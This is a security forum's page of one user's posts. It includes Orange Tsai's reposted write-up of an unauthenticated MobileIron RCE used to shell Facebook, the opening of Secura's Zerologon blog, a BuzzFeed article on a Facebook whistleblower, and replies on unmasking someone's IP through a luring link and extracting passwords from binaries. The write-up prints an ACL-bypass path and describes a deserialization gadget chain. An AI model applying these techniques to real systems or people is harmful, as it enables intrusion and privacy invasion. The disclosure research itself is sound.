Everything posted by Nytro
-
I don't know whether it's legal or illegal, but I don't think it can be done directly with a pixel/image in chat, because Instagram, Facebook, Twitter and other platforms have "protection" against these things: it isn't the user's browser that makes the request to that pixel/image, but the platform's backend. If you really want something to work, you send them a link with something and a message convincing the person to open it. If they do that, you can find out their IP. Now comes the question: what do you do with the IP? These aren't the times of X years ago when a "whois" would show you someone's home address. And an IP is probably used by many people. I don't think it helps much. What's actually the idea? I mean, why would you want to do this? I'm thinking of the case where "you have a problem" with that person, and honestly the solution is simpler: you talk to them and resolve the problem, we're all human.
-
Hi, first of all try opening the application in a text editor like Notepad++ and look through it, you might see the password there. Something more practical would be to run a "strings" utility (Linux or Windows), which automatically extracts the strings, among which the password might be. You can watch the binary's activity, but that decryption will PROBABLY happen in memory. However, I wouldn't be surprised if it runs a command-line binary where the password also shows up, so a solution like Process Monitor, as @gigiRoman also mentioned, could be very useful. If those don't work, the application probably has to be opened in a debugger like x64dbg. If it's something simpler, you can look at the list of imported libraries (DLLs) and set breakpoints on the Zip-opening functions, which probably take the password as one of their parameters. If it's statically linked it's nastier. In principle it can be done, but these would roughly be the steps to try, from simpler to more complicated.
-
So that is a Sandboxie bypass? I haven't seen the file that was sent. I don't see why the connections would be limited, that doesn't seem like a problem to me. English?
-
WinRM is a service that can run on pretty much all Windows versions with PowerShell. It uses HTTP (data isn't transmitted in clear text; it just uses HTTP as the protocol) on port 5985 and HTTPS on port 5986. This service listens on those ports and sysadmins can connect, log in and execute PowerShell scripts/commands. A web proxy is used when you want to connect from a PC to somewhere on the Internet (and, as I was saying, it can be bypassed by design if it's the one set in Windows). Sysadmin -- WinRM --> PC they need to work on -- HTTP via web proxy --> the sites that PC's user visits
-
It's not pointless, it's an alternative to psexec (which is detectable). WinRM is used by sysadmins (officially) for managing Windows systems with PowerShell, the same way SSH and bash are used on Linux. What it actually does is roughly the same thing: it creates a scheduled task through which it runs whatever you want as SYSTEM. Of course, it requires the necessary privileges. You don't "go out to the Internet with system processes" - there's no such limitation anyway. In addition, a global proxy can be set at the operating system level, but applications (of any kind, whether they run under a regular user or as services like SYSTEM) aren't obliged to honor it. There are Windows functions that automatically honor it, but if an application manually creates a socket and connects it to an IP on the Internet, it won't honor that setting.
-
Advanced boolean-based SQLi filter bypass techniques
Nytro replied to Nytro's topic in Securitate web
Yes, WordPress uses prepared statements (which isn't true of all themes and plugins); I think it was just used for testing when the article was written, to make it easier to understand. -
“I Have Blood on My Hands”: A Whistleblower Says Facebook Ignored Global Political Manipulation

A 6,600-word internal memo from a fired Facebook data scientist details how the social network knew leaders of countries around the world were using their site to manipulate voters — and failed to act.

Craig Silverman, Ryan Mac, Pranav Dixit, BuzzFeed News Reporters
Posted on September 14, 2020, at 3:36 p.m. ET

Facebook ignored or was slow to act on evidence that fake accounts on its platform have been undermining elections and political affairs around the world, according to an explosive memo sent by a recently fired Facebook employee and obtained by BuzzFeed News.

The 6,600-word memo, written by former Facebook data scientist Sophie Zhang, is filled with concrete examples of heads of government and political parties in Azerbaijan and Honduras using fake accounts or misrepresenting themselves to sway public opinion. In countries including India, Ukraine, Spain, Brazil, Bolivia, and Ecuador, she found evidence of coordinated campaigns of varying sizes to boost or hinder political candidates or outcomes, though she did not always conclude who was behind them.

“In the three years I’ve spent at Facebook, I’ve found multiple blatant attempts by foreign national governments to abuse our platform on vast scales to mislead their own citizenry, and caused international news on multiple occasions,” wrote Zhang, who declined to talk to BuzzFeed News. Her LinkedIn profile said she “worked as the data scientist for the Facebook Site Integrity fake engagement team” and dealt with “bots influencing elections and the like.”

“I have personally made decisions that affected national presidents without oversight, and taken action to enforce against so many prominent politicians globally that I’ve lost count,” she wrote.

The memo is a damning account of Facebook’s failures. It’s the story of Facebook abdicating responsibility for malign activities on its platform that could affect the political fate of nations outside the United States or Western Europe. It's also the story of a junior employee wielding extraordinary moderation powers that affected millions of people without any real institutional support, and the personal torment that followed.

“I know that I have blood on my hands by now,” Zhang wrote.

These are some of the biggest revelations in Zhang’s memo:

- It took Facebook’s leaders nine months to act on a coordinated campaign “that used thousands of inauthentic assets to boost President Juan Orlando Hernandez of Honduras on a massive scale to mislead the Honduran people.” Two weeks after Facebook took action against the perpetrators in July, they returned, leading to a game of “whack-a-mole” between Zhang and the operatives behind the fake accounts, which are still active.
- In Azerbaijan, Zhang discovered the ruling political party “utilized thousands of inauthentic assets... to harass the opposition en masse.” Facebook began looking into the issue a year after Zhang reported it. The investigation is ongoing.
- Zhang and her colleagues removed “10.5 million fake reactions and fans from high-profile politicians in Brazil and the US in the 2018 elections.”
- In February 2019, a NATO researcher informed Facebook that "he’d obtained Russian inauthentic activity on a high-profile U.S. political figure that we didn’t catch." Zhang removed the activity, “dousing the immediate fire,” she wrote.
- In Ukraine, Zhang “found inauthentic scripted activity” supporting both former prime minister Yulia Tymoshenko, a pro–European Union politician and former presidential candidate, as well as Volodymyr Groysman, a former prime minister and ally of former president Petro Poroshenko. “Volodymyr Zelensky and his faction was the only major group not affected,” Zhang said of the current Ukrainian prime minister.
- Zhang discovered inauthentic activity — a Facebook term for engagement from bot accounts and coordinated manual accounts — in Bolivia and Ecuador but chose “not to prioritize it,” due to her workload.
- The amount of power she had as a mid-level employee to make decisions about a country’s political outcomes took a toll on her health.
- After becoming aware of coordinated manipulation on the Spanish Health Ministry’s Facebook page during the COVID-19 pandemic, Zhang helped find and remove 672,000 fake accounts “acting on similar targets globally” including in the US.
- In India, she worked to remove “a politically-sophisticated network of more than a thousand actors working to influence" the local elections taking place in Delhi in February. Facebook never publicly disclosed this network or that it had taken it down.

“We’ve built specialized teams, working with leading experts, to stop bad actors from abusing our systems, resulting in the removal of more than 100 networks for coordinated inauthentic behavior," Facebook spokesperson Liz Bourgeois said in a statement. "It’s highly involved work that these teams do as their full-time remit. Working against coordinated inauthentic behavior is our priority, but we’re also addressing the problems of spam and fake engagement. We investigate each issue carefully, including those that Ms. Zhang raises, before we take action or go out and make claims publicly as a company."

BuzzFeed News is not publishing Zhang’s full memo because it contains personal information. This story includes full excerpts when possible to provide appropriate context.

In her post, Zhang said she did not want it to go public for fear of disrupting Facebook’s efforts to prevent problems around the upcoming 2020 US presidential election, and due to concerns about her own safety. BuzzFeed News is publishing parts of her memo that are clearly in the public interest.

“I consider myself to have been put in an impossible spot – caught between my loyalties to the company and my loyalties to the world as a whole,” she said. “The last thing I want to do is distract from our efforts for the upcoming U.S. elections, yet I know this post will likely do so internally.”

Zhang said she turned down a $64,000 severance package from the company to avoid signing a nondisparagement agreement. Doing so allowed her to speak out internally, and she used that freedom to reckon with the power that she had to police political speech.

“There was so much violating behavior worldwide that it was left to my personal assessment of which cases to further investigate, to file tasks, and escalate for prioritization afterwards,” she wrote.

That power contrasted with what she said seemed to be a lack of desire from senior leadership to protect democratic processes in smaller countries. Facebook, Zhang said, prioritized regions including the US and Western Europe, and often only acted when she repeatedly pressed the issue publicly in comments on Workplace, the company’s internal, employee-only message board.

“With no oversight whatsoever, I was left in a situation where I was trusted with immense influence in my spare time,” she wrote. “A manager on Strategic Response mused to myself that most of the world outside the West was effectively the Wild West with myself as the part-time dictator – he meant the statement as a compliment, but it illustrated the immense pressures upon me.”

A former Facebook engineer who knew her told BuzzFeed News that Zhang was skilled at discovering fake account networks on the platform.

“She's the only person in this entire field at Facebook that I ever trusted to be earnest about this work," said the engineer, who had seen a copy of Zhang’s post and asked not to be named because they no longer work at the company. “A lot of what I learned from that post was shocking even to me as someone who's often been disappointed at how the company treats its best people," they said.

Zhang’s memo said the lack of institutional support and heavy stakes left her unable to sleep. She often felt responsible when civil unrest took hold in places she didn’t prioritize for investigation and action.

“I have made countless decisions in this vein – from Iraq to Indonesia, from Italy to El Salvador,” she wrote. “Individually, the impact was likely small in each case, but the world is a vast place.”

Still, she did not believe that the failures she observed during her two and a half years at the company were the result of bad intent by Facebook’s employees or leadership. It was a lack of resources, Zhang wrote, and the company’s tendency to focus on global activity that posed public relations risks, as opposed to electoral or civic harm.

“Facebook projects an image of strength and competence to the outside world that can lend itself to such theories, but the reality is that many of our actions are slapdash and haphazard accidents,” she wrote.

“We simply didn’t care enough to stop them”

Zhang wrote that she was just six months into the job when she found coordinated inauthentic behavior — Facebook’s internal term for the use of multiple fake accounts to boost engagement or spread content — benefiting Honduran President Juan Orlando Hernández.

The connection to the Honduran leader was made, Zhang said, because an administrator for the president’s Facebook page had been “happily running hundreds of these fake assets without any obfuscation whatsoever in a show of extreme chutzpah.”

The data scientist said she reported the operation, which involved thousands of fake accounts, to Facebook’s threat intelligence and policy review teams, both of which took months to act.

“Local policy teams confirmed that President JOH’s marketing team had openly admitted to organizing the activity on his behalf,” she wrote. “Yet despite the blatantly violating nature of this activity, it took me almost a year to take down his operation.”

That takedown was announced by Facebook in July 2019, but proved futile. Soon, the operation was back up and running, a fact Facebook has never disclosed.

“They had returned within two weeks of our takedown and were back in a similar volume of users,” Zhang wrote, adding that she did a final sweep for the fake accounts on her last day at Facebook. “A year after our takedown, the activity is still live and well.”

In Azerbaijan, she found a large network of inauthentic accounts used to attack opponents of President Ilham Aliyev of Azerbaijan and his ruling New Azerbaijan Party, which uses the acronym YAP. Facebook still has not disclosed the influence campaign, according to Zhang.

The operation detailed in the memo is reminiscent of those of Russia’s Internet Research Agency, a private troll farm that tried to influence the 2016 US elections, because it involved “dedicated employees who worked 9-6 Monday-Friday work weeks to create millions of comments” targeting members of the opposition and media reports seen as negative to Aliyev.

“Multiple official accounts for district-level divisions of the ruling YAP political party directly controlled numerous of these fake assets without any obfuscation whatsoever in another display of arrogance,” she wrote. “Perhaps they thought they were clever; the truth was, we simply didn’t care enough to stop them.”

Katy Pearce, an associate professor at the University of Washington who studies social media and communication technology in Azerbaijan, told BuzzFeed News that fake Facebook accounts have been used to undermine the opposition and independent media in the country for years.

“One of the big tools of authoritarian regimes is to humiliate the opposition in the mind of the public so that they're not viewed as a credible or legitimate alternative,” she told BuzzFeed News. “There's a chilling effect. Why would I post something if I know that I'm going to deal with thousands or hundreds of these comments, that I'm going to be targeted?”

Pearce said Zhang’s comment in the memo that Facebook “didn’t care enough to stop” the fake accounts and trolling aligns with her experience. “They have bigger fish to fry,” she said.

A person who managed social media accounts for news organizations in Azerbaijan told BuzzFeed News that their pages were inundated with inauthentic Facebook comments.

“We used to delete and ban them because we didn’t want people who came to our page to be discouraged and not react or comment,” said the person, who asked not to be named because they were not authorized to speak for their employer. “But since [the trolls] are employees, it’s easy for them to open new accounts.”

They said Facebook has at times made things worse by removing the accounts or pages of human rights activists and other people after trolls report them. “We tried to tell Facebook that this is a real person who does important work,” but it took weeks for the page to be restored.

Zhang wrote that a Facebook investigation into fake accounts and trolling in Azerbaijan is now underway, more than a year after she first reported the issue. On the day of her departure, she called it her “greatest unfinished business” to stop the fake behavior in the country.

“Many others would think nothing of myself devoting this attention to the United States, but are shocked to see myself fighting for these small countries,” she wrote. “To put it simply, my methodologies were systematic globally, and I fought for Honduras and Azerbaijan because that was where I saw the most ongoing harm.”

“I have blood on my hands”

In other examples, Zhang revealed new information about a large-scale fake account network used to amplify and manipulate information about COVID-19, as well as a political influence operation that used fake accounts to influence 2018 elections in the US and Brazil. Some of these details were not previously disclosed by Facebook, suggesting the company’s regular takedown announcements remain selective and incomplete.

Zhang said Facebook removed 672,000 “low-quality fake accounts” after press reports in April that some of the accounts had been engaging with COVID-19 content on the Spanish Health Ministry’s page. She said accounts in that network also engaged with content on US pages. Facebook did not disclose how many accounts it removed, or that those accounts engaged with content in other countries, including the US.

Zhang also shared new details about the scale of inauthentic activity during the 2018 midterm elections in the US, and from Brazilian politicians that same year.

“We ended up removing 10.5 million fake reactions and fans from high-profile politicians in Brazil and the U.S. in the 2018 elections – major politicians of all persuasions in Brazil, and a number of lower-level politicians in the United States,” she wrote.

A September 2018 briefing about Facebook’s election work in the US and Brazil disclosed that it had acted against a network in Brazil that used “fake accounts to sow division and share disinformation,” as well as a set of groups, pages, and accounts that were “falsely amplifying engagement for financial gain.” It did not fully mention Zhang's findings.

The scale of this activity — 672,000 fake accounts in one network, 10.5 million fake engagement and fans in others — indicates active fake accounts are a global problem, and are used to manipulate elections and public debate around the world.

As one of the few people looking for and identifying fake accounts impacting civic activity outside of “priority” regions, Zhang struggled with the power she had been handed.

“We focus upon harm and priority regions like the United States and Western Europe,” Zhang wrote, adding that “it became impossible to read the news and monitor world events without feeling the weight of my own responsibility.”

In Bolivia, Zhang said she found “inauthentic activity supporting the opposition presidential candidate in 2019” and chose not to prioritize it. Months later, Bolivian politics fell into turmoil, leading to the resignation of President Evo Morales and “mass protests leading to dozens of deaths.”

The same happened in Ecuador, according to Zhang, who “found inauthentic activity supporting the ruling government… and made the decision not to prioritize it.” The former Facebook employee then wondered how her decision led to downstream effects on how Ecuador’s government handled the COVID-19 pandemic — which has devastated the country — and if that would have been different if she'd acted.

“I have made countless decisions in this vein – from Iraq to Indonesia, from Italy to El Salvador. Individually, the impact was likely small in each case, but the world is a vast place. Although I made the best decision I could based on the knowledge available at the time, ultimately I was the one who made the decision not to push more or prioritize further in each case, and I know that I have blood on my hands by now.”

Zhang also uncovered issues in India, Facebook’s largest market, in the lead-up to the local Delhi elections in February 2020. “I worked through sickness to take down a politically-sophisticated network of more than a thousand actors working to influence the election,” she wrote.

Last month, Facebook’s Indian operation came under scrutiny after reports in the Wall Street Journal revealed a top policy executive in the country had stopped local staffers from applying the company’s hate speech policies to ruling party politicians who posted anti-Muslim hate speech.

“Haphazard Accidents”

In her “spare time” in 2019, Zhang took on tasks usually reserved for product managers and investigators, searching out countries including Ukraine, Turkey, India, Indonesia, the Philippines, Australia, the United Kingdom, Taiwan, “and many many more.”

Zhang said she found and took down “inauthentic scripted activity” in Ukraine that supported Yulia Tymoshenko, a complicated political figure who has been involved in controversial gas deals with Russia but taken a more pro-Western tack in her later career, as well as for former prime minister Volodymyr Groysman, an ally of former president Petro Poroshenko. “Volodymyr Zelensky and his faction was the only major group not affected,” she wrote.

In another part of her memo, Zhang said she wanted to push back on the idea that Facebook was run by malicious people hoping to achieve a particular outcome. That was not the case, she wrote, attributing actions to “slapdash and haphazard accidents.”

“Last year when we blocked users from naming the Ukraine whistleblower, we forgot to cover hashtags until I stepped in,” she wrote.

But she also remarked on Facebook’s habit of prioritizing public relations over real-world problems. “It’s an open secret within the civic integrity space that Facebook’s short-term decisions are largely motivated by PR and the potential for negative attention,” she wrote, noting that she was told directly at a 2020 summit that anything published in the New York Times or Washington Post would obtain elevated priority.

“It’s why I’ve seen priorities of escalations shoot up when others start threatening to go to the press, and why I was informed by a leader in my organization that my civic work was not impactful under the rationale that if the problems were meaningful they would have attracted attention, became a press fire, and convinced the company to devote more attention to the space.”

Zhang mentioned one example in February 2019, when a NATO strategic communications researcher reached out to Facebook, alerting the company that he'd "obtained" Russian inauthentic activity “on a high-profile U.S. political figure that we didn’t catch.” That researcher said they were planning on briefing Congress the next day.

“I quickly investigated the case, determined what was going on, and removed the activity, dousing the immediate fire,” Zhang wrote. “Perhaps motivated by the experience, the same researcher tried the same experiment within a month or two, waiting half a year afterwards before sending the report to the press and finally causing the PR fire.”

“Human Resources Are Limited”

Beyond specific examples from around the world, Zhang provided insight into the inner workings at Facebook. She criticized her team’s focus on issues related to “99% of activity that’s essentially spam.”

“Overall, the focus of my organization – and most of Facebook – was on large-scale problems, an approach which fixated us on spam,” she said. “The civic aspect was discounted because of its small volume, its disproportionate impact ignored.”

Zhang outlined the political processes within Facebook itself. She said the best way for her to gain attention for her work was not to go through the proper reporting channels, but to post about the issues on Facebook’s internal employee message board to build pressure.

“In the office, I realized that my viewpoints weren’t respected unless I acted like an arrogant asshole,” Zhang said.

When she asked the company to do more in terms of finding and stopping malicious activity related to elections and political activity, she said she was told that “human resources are limited.” And when she was ordered to stop focusing on civic work, “I was told that Facebook would no longer have further need for my services if I refused.”

Zhang was fired this month and posted her memo on her last day, even after offering to stay on through the election as an unpaid volunteer. In her goodbye, she encouraged her colleagues to remain at Facebook and to fix the company from within.

“But you don’t – and shouldn’t – need to do it alone,” she wrote. “Find others who share your convictions and values to work on it together. Facebook is too big of a project for any one person to fix.”

Source: https://www.buzzfeednews.com/article/craigsilverman/facebook-ignore-political-manipulation-whistleblower-memo
-
How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
Nytro replied to Nytro's topic in Securitate web
Yes, this guy is good, he's just a bit of a braggart (I saw him at Black Hat Asia). And it's good to know that he discovered many things by doing CTFs (both participating in them and doing exercises). -
How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM Author: Orange Tsai This is a cross-post blog from DEVCORE. 中文版請參閱這裡 Hi, it’s a long time since my last article. This new post is about my research this March, which talks about how I found vulnerabilities on a leading Mobile Device Management product and bypassed several limitations to achieve unauthenticated RCE. All the vulnerabilities have been reported to the vendor and got fixed in June. After that, we kept monitoring large corporations to track the overall fixing progress and then found that Facebook didn’t keep up with the patch for more than 2 weeks, so we dropped a shell on Facebook and reported to their Bug Bounty program! This research is also presented at HITCON 2020. You can check the slides HERE As a Red Teamer, we are always looking for new paths to infiltrate the corporate network from outside. Just like our research in Black Hat USA last year, we demonstrated how leading SSL VPNs could be hacked and become your Virtual “Public” Network! SSL VPN is trusted to be secure and considered the only way to your private network. But, what if your trusted appliances are insecure? Based on this scenario, we would like to explore new attack surfaces on enterprise security, and we get interested in MDM, so this is the article for that! What is MDM? Mobile Device Management, also known as MDM, is an asset assessment system that makes the employees’ BYOD more manageable for enterprises. It was proposed in 2012 in response to the increasing number of tablets and mobile devices. MDM can guarantee that the devices are running under the corporate policy and in a trusted environment. Enterprise could manage assets, install certificates, deploy applications and even lock/wipe devices remotely to prevent data leakage as well. UEM (Unified Endpoint Management) is a newer term relevant to MDM which has a broader definition for managed devices. Following we use MDM to represent similar products! 
Our target MDM, as a centralized system, can manage and control all employees’ devices. It is undoubtedly an ideal asset assessment system for a growing company. Besides, MDM must be reachable publicly to synchronize devices all over the world. A centralized and public-exposing appliance, what could be more appealing to hackers? Therefore, we have seen hackers and APT groups abusing MDM these years! Such as phishing victims to make MDM a C&C server of their mobile devices, or even compromising the corporate exposed MDM server to push malicious Trojans to all devices. You can read the report Malicious MDM: Let’s Hide This App by Cisco Talos team and First seen in the wild - Malware uses Corporate MDM as attack vector by CheckPoint CPR team for more details! From previous cases, we know that MDM is a solid target for hackers, and we would like to do research on it. There are several MDM solutions, even famous companies such as Microsoft, IBM and Apple have their own MDM solution. Which one should we start with? We have listed known MDM solutions and scanned corresponding patterns all over the Internet. We found that the most prevalent MDMs are VMware AirWatch and MobileIron! So, why did we choose MobileIron as our target? According to their official website, more than 20,000 enterprises chose MobileIron as their MDM solution, and most of our customers are using that as well. We also know Facebook has exposed the MobileIron server since 2016. We have analyzed Fortune Global 500 as well, and found more than 15% using and exposing their MobileIron server to the public! Due to above reasons, it became our main target! Where to Start From past vulnerabilities, we learned there aren’t too many researchers diving into MobileIron. Perhaps the attack vector is still unknown. But we suspect the main reason is that the firmware is too hard to obtain. When researching an appliance, turning a pure BlackBox testing into GrayBox, or WhiteBox testing is vital. 
We spent lots of time searching for all kinds of information on the Internet, and ended up with an RPM package. This RPM file is supposed to be the developer’s testing package. The file is just sitting on a listable WebRoot and indexed by Google Search. Anyway, we got a file to research. The released date of the file is in early 2018. It seems a little bit old but still better than nothing! P.S. We have informed MobileIron and the sensitive files has been removed now. Finding Vulnerabilities After a painful time solving the dependency hell, we set the testing package up finally. The component is based on Java and exposed three ports: 443 - the user enrollment interface 8443 - the appliance management interface 9997 - the MobileIron device synchronization protocol (MI Protocol) All opened ports are TLS-encrypted. Apache is in the front of the web part and proxies all connections to backend, a Tomcat with Spring MVC inside. Due to the Spring MVC, it’s hard to find traditional vulnerabilities like SQL Injection or XSS from a single view. Therefore, examining the logic and architecture is our goal this time! Talking about the vulnerability, the root cause is straightforward. Tomcat exposed a Web Service that deserializes user input with Hessian format. However, this doesn’t mean we can do everything! The main effort of this article is to solve that, so please see the exploitation below. Although we know the Web Service deserializes the user input, we can not trigger it. The endpoint is located on both: User enrollment interface - https://mobileiron/mifs/services/ Management interface - https://mobileiron:8443/mics/services/ We can only touch the deserialization through the management interface because the user interface blocks the Web Service access. It’s a critical hit for us because most enterprises won’t expose their management interface to the Internet, and a management-only vulnerability is not useful to us so that we have to try harder. 
Scrutinizing the architecture, we found Apache blocks our access through Rewrite Rules. It looks good, right?

RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L]
RewriteRule ^/mifs/services [F]

MobileIron relied on Apache Rewrite Rules to block all access to the Web Service. It's in front of a reverse-proxy architecture, and the backend is a Java-based web server. Have you recalled something? Yes, the Breaking Parser Logic! It's the reverse proxy attack surface I proposed in 2015 and presented at Black Hat USA 2018. This technique leverages the inconsistency between Apache and Tomcat to bypass the ACL control and re-access the Web Service. BTW, this excellent technique also applies to the recent F5 BIG-IP TMUI RCE vulnerability!

https://mobileiron/mifs/.;/services/someService

Exploiting Vulnerabilities

OK, now we have access to the deserialization whether it's on the enrollment interface or the management interface. Let's go back to exploitation! Moritz Bechler has an awesome piece of research which summarized the Hessian deserialization vulnerability in his whitepaper, Java Unmarshaller Security. From the marshalsec source code, we learn that Hessian deserialization triggers equals() and hashCode() while reconstructing a HashMap. It could also trigger toString() through XString, and the known exploit gadgets so far are:

Apache XBean
Caucho Resin
Spring AOP
ROME EqualsBean/ToStringBean

In our environment, we could only trigger the Spring AOP gadget chain and get a JNDI Injection.

    Name                 Effect
x   Apache XBean         JNDI Injection
x   Caucho Resin         JNDI Injection
√   Spring AOP           JNDI Injection
x   ROME EqualsBean      RCE

Once we have a JNDI Injection, the rest of the exploitation is easy! We can just leverage Alvaro Muñoz and Oleksandr Mirosh's work, A Journey From JNDI/LDAP to Remote Code Execution Dream Land, from Black Hat USA 2016 to get code execution... Is that true?
Since Alvaro Muñoz and Oleksandr Mirosh introduced this at Black Hat, we could say that this technique has helped countless security researchers and brought Java deserialization vulnerabilities into a new era. However, Java finally mitigated the last JNDI/LDAP puzzle in October 2018. After that, all Java versions higher than 8u181, 7u191, and 6u201 can no longer get code execution through JNDI remote URL class loading. Therefore, if we exploit the Hessian deserialization on the latest MobileIron, we must face this problem!

Java changed the default value of com.sun.jndi.ldap.object.trustURLCodebase to false to prevent attackers from downloading a remote URL class to get code execution. But only this has been prohibited. We can still manipulate the JNDI and redirect the Naming Reference to a local Java class! The concept is a little bit similar to Return-Oriented Programming, utilizing a locally existing Java class to do further exploitation. You can refer to the article Exploiting JNDI Injections in Java by Michael Stepankin from early 2019 for details. It describes the attack on post-JNDI exploitation and how to abuse Tomcat's BeanFactory to populate the ELProcessor gadget to get code execution. Based on this concept, researcher Welkin also provides another ParseClass gadget on Groovy. As described in his (Chinese) article:

Besides javax.el.ELProcessor, there are of course many other classes that meet the conditions and can be injected into the BeanFactory as the beanClass to achieve exploitation. For example, if the target machine's classpath contains the Groovy library, it can be combined with the Jenkins vulnerability that Orange published earlier to achieve exploitation.

It seems the Meta Programming exploitation in my previous Jenkins research could be used here as well. It makes Meta Programming great again!

The approach is fantastic and looks feasible for us. But both gadgets, ELProcessor and ParseClass, are unavailable due to our outdated target libraries. Tomcat introduced the ELProcessor in 8.5, but our target is 7.
As for the Groovy gadget, the target Groovy version is too old (1.5.6 from 2008) to support Meta Programming, so we still have to find a new gadget by ourselves. We found a new gadget on GroovyShell in the end. If you are interested, you can check the Pull Request I sent to the JNDI-Injection-Bypass project!

Attacking Facebook

Now we have a perfect RCE by chaining JNDI Injection, Tomcat BeanFactory and GroovyShell. It's time to hack Facebook! As mentioned, we knew that Facebook has used MobileIron since 2016. Although the server's index responds 403 Forbidden now, the Web Service is still accessible! Everything is ready and waiting for our exploit!

However, several days before our scheduled attack, we realized that there is a critical problem in our exploit. From our last time popping a shell on Facebook, we noticed it blocks outbound connections due to security concerns. The outbound connection is vital for JNDI Injection because the idea is to make victims connect to a malicious server to do further exploitation. But now, we can't even make an outbound connection, not to mention others.

So far, all attack surfaces on JNDI Injection have been closed; we have no choice but to return to Hessian deserialization. But due to the lack of available gadgets, we must discover a new one by ourselves! Before discovering a new gadget, we have to understand the existing gadgets' root cause properly. After re-reading Moritz Bechler's paper, a certain sentence interested me:

Cannot restore Groovy's MethodClosure as readResolve() is called which throws an exception.

A question quickly came up in my mind: why did the author leave this sentence here? Although it failed with exceptions, there must have been something special so that the author wrote this down. Our target is running with a very old Groovy, so we are guessing that the readResolve() constraint might not have been applied to the code base yet! We compared the file groovy/runtime/MethodClosure.java between the latest version and 1.5.6.
$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java
>     private Object readResolve() {
>         if (ALLOW_RESOLVE) {
>             return this;
>         }
>         throw new UnsupportedOperationException();
>     }

Yes, we are right. There is no ALLOW_RESOLVE in Groovy 1.5.6, and we later learned CVE-2015-3253 is just for that. It's a mitigation for the rising Java deserialization vulnerability in 2015. Since Groovy is an internally used library, developers won't update it if there is no emergency. The outdated Groovy could also be a good case study to demonstrate how a harmless component can leave you compromised! Of course we got the shell on Facebook in the end. Here is the video:

Vulnerability Report and Patch

We did all the research in March and sent the advisory to MobileIron on 4/3. MobileIron released the patch on 6/15 and addressed three CVEs for that. You can check the official website for details!

CVE-2020-15505 - Remote Code Execution
CVE-2020-15506 - Authentication Bypass
CVE-2020-15507 - Arbitrary File Reading

After the patch was released, we started monitoring the Internet to track the overall fixing progress. Here we check the Last-Modified header on static files, so the result is just for your information. (Unknown stands for the server closing both the 443 and 8443 ports.)

At the same time, we kept our attention on Facebook as well. With 15 days of no-patch confirmation, we finally popped a shell and reported it to their Bug Bounty program on 7/2!

Conclusion

So far, we have demonstrated a completely unauthenticated RCE on MobileIron, from how we got the firmware, found the vulnerability, and bypassed the JNDI mitigation and network limitation. There are other stories, but due to time, we have just listed the topics here for those who are interested:

How to take over the employees' devices from MDM
Disassemble the MI Protocol
And CVE-2020-15506, an interesting authentication bypass

I hope this article could draw attention to MDM and the importance of enterprise security!
Thanks for reading.

Source: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
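The rewrite-rule bypass described in the post above rests on Apache matching its rule against the raw request path while Tomcat normalizes the path (dropping ";" path parameters from each segment and resolving "." before mapping it). The following Python is an added example, not code from the post or from MobileIron: it approximates that normalization, reports requests where the front-end view and the backend view of the path disagree, and runs the check over a few constructed Apache access-log lines so it can be used as a log-review or WAF-side consistency test. The normalization function is an assumption written for illustration, not Tomcat's actual code; the blocked prefix is taken from the RewriteRule quoted above.

```python
import re
from urllib.parse import unquote

# The front-end rule from the post: Apache refuses any raw request path starting with /mifs/services.
BLOCK_RULE = re.compile(r"^/mifs/services")

# Constructed Apache access-log lines for illustration (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Sep/2020:10:00:01 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 1432',
    '198.51.100.7 - - [12/Sep/2020:10:00:02 +0000] "POST /mifs/services/someService HTTP/1.1" 403 199',
    '198.51.100.7 - - [12/Sep/2020:10:00:03 +0000] "POST /mifs/.;/services/someService HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Sep/2020:10:00:04 +0000] "GET /mifs/c/;jsessionid=abc/app HTTP/1.1" 200 88',
]
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def servlet_normalize(path: str) -> str:
    """Approximate the path a servlet container maps after it has percent-decoded the
    request, dropped ';...' path parameters from every segment and collapsed '.' / '..'.
    This is an assumption about Tomcat's behaviour written for illustration, not its code."""
    out = []
    for seg in unquote(path).split("/"):
        seg = seg.split(";", 1)[0]          # ';jsessionid=...' or a bare ';' is not part of the name
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def acl_mismatch(path: str) -> bool:
    """True when the raw path slips past the front-end rule but the backend resolves it
    to a resource the rule was meant to cover: the parser-inconsistency signal."""
    raw_blocked = bool(BLOCK_RULE.match(path))
    backend_blocked = bool(BLOCK_RULE.match(servlet_normalize(path)))
    return backend_blocked and not raw_blocked


def flag_requests(lines) -> list:
    """Return the request targets in an access log that exhibit the mismatch."""
    flagged = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target").split("?", 1)[0]   # compare the path only, not the query string
        if acl_mismatch(target):
            flagged.append(target)
    return flagged


if __name__ == "__main__":
    for target in flag_requests(SAMPLE_LOG):
        print("front-end/backend path mismatch:", target, "->", servlet_normalize(target))
```

The usual fix is the one the rule's own shape suggests: enforce the ACL on the component that actually maps the path (the servlet container or the application), or normalize the request the same way the backend does before applying the front-end rule; a detection based on the mismatch is a useful stopgap while that is done.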
-
[Blog] Zerologon: instantly become domain admin by subverting Netlogon cryptography (CVE-2020-1472)

Blog post 11 September 2020, by Tom Tervoort, Senior Security Specialist and Ralph Moonen, Technical Director at Secura

Last month, Microsoft patched a very interesting vulnerability that would allow an attacker with a foothold on your internal network to essentially become Domain Admin with one click. All that is required is for a connection to the Domain Controller to be possible from the attacker's viewpoint.

Secura's security expert Tom Tervoort previously discovered a less severe Netlogon vulnerability last year that allowed workstations to be taken over, but the attacker required a Person-in-the-Middle (PitM) position for that to work. Now, he discovered this second, much more severe (CVSS score: 10.0) vulnerability in the protocol. By forging an authentication token for specific Netlogon functionality, he was able to call a function to set the computer password of the Domain Controller to a known value. After that, the attacker can use this new password to take control over the domain controller and steal credentials of a domain admin.

The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This flaw allows attackers to impersonate any computer, including the domain controller itself, and execute remote procedure calls on their behalf.

